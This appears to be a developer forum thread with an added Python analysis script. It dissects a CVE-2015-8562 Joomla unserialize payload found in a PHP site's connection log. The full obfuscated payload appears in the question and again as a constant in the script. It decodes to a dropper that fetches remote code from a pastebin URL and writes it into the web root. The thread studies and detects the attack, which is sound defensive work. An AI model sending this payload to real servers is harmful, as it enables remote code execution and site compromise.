Some time ago I developed a website written in pure PHP, without a database. Users and content are managed through directories from an administrative section. I added a lot of security so that the contents cannot be accessed externally and passwords cannot be easily broken.
The issue is that in the section where I view the IPs of daily connections, which are recorded in a text file, I find the following:
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:979:"eval(chr(102).chr(119).chr(114).chr(105).chr(116).chr(101).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(120).chr(114).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(43).chr(39).chr(41).chr(44).chr(102).chr(105).chr(108).chr(101).chr(95).chr(103).chr(101).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(112).chr(97).chr(115).chr(116).chr(101).chr(98).chr(105).chr(110).chr(46).chr(99).chr(111).chr(109).chr(47).chr(114).chr(97).chr(119).chr(47).chr(75).chr(102).chr(104).chr(66).chr(114).chr(106).chr(82).chr(98).chr(39).chr(41).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
This sounds to me like a possible code injection attempt... without any success! Can someone identify it and explain to me what it is? Thanks in advance!
If you decode the chr() calls you get the string:
fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/rxr.php','w+'),file_get_contents('https://pastebin.com/raw/KfhBrjRb'));
The script in question is as follows:
It allows obtaining server information (operating system type, host name, operating system version, processor architecture and the base path of the web server):
And apparently they use it to carry out attacks depending on the type of machine you have:
Update:
I think this is an attempt to exploit the CVE-2015-8562 vulnerability: https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/
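To make the decoding above reproducible, here is a small Python script, added here as an example and not part of the original answer, that pulls the logged request string apart: it decodes every chr().chr()... concatenation chain, lists the serialized PHP object classes, extracts the URL fetched and the file written, and flags the JDatabaseDriverMysqli / SimplePie / assert combination that is the published CVE-2015-8562 gadget chain. The PAYLOAD constant is the line from the question; the function names and the "joomla_gadget" signature check are this example's own choices.

```python
"""Decode and flag the Joomla unserialize (CVE-2015-8562) gadget chain
found in the question's connection log.  Added example, not code from
the original post.  PAYLOAD is the logged line from the question; the
leading '}' closes the previous serialized session entry so that
'__test|O:21:...' is parsed as a new session key holding the injected
object.  Everything else here is illustrative."""
import json
import re

PAYLOAD = (
    r'}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}'
    r's:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{'
    r's:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:979:"eval('
    r'chr(102).chr(119).chr(114).chr(105).chr(116).chr(101).chr(40).'
    r'chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).'
    r'chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).'
    r'chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).'
    r'chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).'
    r'chr(39).chr(47).chr(114).chr(120).chr(114).chr(46).chr(112).chr(104).chr(112).chr(39).'
    r'chr(44).chr(39).chr(119).chr(43).chr(39).chr(41).chr(44).'
    r'chr(102).chr(105).chr(108).chr(101).chr(95).chr(103).chr(101).chr(116).chr(95).'
    r'chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(39).'
    r'chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).'
    r'chr(112).chr(97).chr(115).chr(116).chr(101).chr(98).chr(105).chr(110).'
    r'chr(46).chr(99).chr(111).chr(109).chr(47).chr(114).chr(97).chr(119).chr(47).'
    r'chr(75).chr(102).chr(104).chr(66).chr(114).chr(106).chr(82).chr(98).'
    r'chr(39).chr(41).chr(41).chr(59));JFactory::getConfig();exit";'
    r's:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;'
    r's:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}'
    r's:13:"\0\0\0connection";b:1;}'
)

CHR_CALL = re.compile(r"chr\((\d{1,3})\)")
# Two or more chr() calls joined by PHP's '.' concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\d{1,3}\)(?:\s*\.\s*chr\(\d{1,3}\))+")
# Serialized PHP object header: O:<name length>:"<class name>"
PHP_OBJECT = re.compile(r'O:(\d+):"([^"]+)"')


def decode_chr_chain(chain: str) -> str:
    """Turn chr(102).chr(119)... into the text PHP would build from it."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(chain))


def decode_chr_chains(text: str) -> list:
    """Decode every chr() concatenation chain found in text, in order."""
    return [decode_chr_chain(m.group(0)) for m in CHR_CHAIN.finditer(text)]


def php_classes(payload: str) -> list:
    """Class names of every serialized object whose declared length is
    consistent with the name (a cheap guard against false matches)."""
    return [name for length, name in PHP_OBJECT.findall(payload)
            if int(length) == len(name)]


def is_joomla_unserialize_gadget(payload: str) -> bool:
    """Signature of the CVE-2015-8562 chain: a JDatabaseDriverMysqli whose
    disconnectHandlers hold a SimplePie object that feeds feed_url into
    assert() through cache_name_function."""
    classes = set(php_classes(payload))
    return (
        "JDatabaseDriverMysqli" in classes
        and "SimplePie" in classes
        and "disconnectHandlers" in payload
        and re.search(r's:19:"cache_name_function";s:6:"assert"', payload) is not None
    )


def analyze_log_line(line: str) -> dict:
    """Summarise one logged request string: gadget match, object classes,
    decoded PHP, remote URLs fetched and files dropped under DOCUMENT_ROOT."""
    decoded = decode_chr_chains(line)
    joined = " ".join(decoded)
    return {
        "joomla_gadget": is_joomla_unserialize_gadget(line),
        "classes": php_classes(line),
        "decoded": decoded,
        "urls": re.findall(r"https?://[^\s'\"()]+", joined),
        "dropped_files": re.findall(r"\$_SERVER\['DOCUMENT_ROOT'\]\.'([^']+)'", joined),
    }


if __name__ == "__main__":
    print(json.dumps(analyze_log_line(PAYLOAD), indent=2))
```

Run against the logged line it reports the Joomla gadget match, the five serialized objects, the decoded fwrite(...) dropper, the pastebin URL it would fetch and /rxr.php as the file it would create in the web root. The gadget only fires inside an application that actually has those Joomla classes and unserializes session data on read; against a hand-written PHP site without Joomla the object is never instantiated, which matches the "without any success" in the question. Pointing the same function at the rest of the log file will also show whether the same client tried other chr() or serialized payloads.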
If it is a cross-site-scripting-type code injection, it is just doing data collection; sanitize your inputs well and check with nmap that you do not have ports open that you should not have. https://php.net/manual/en/filter.filters.sanitize.php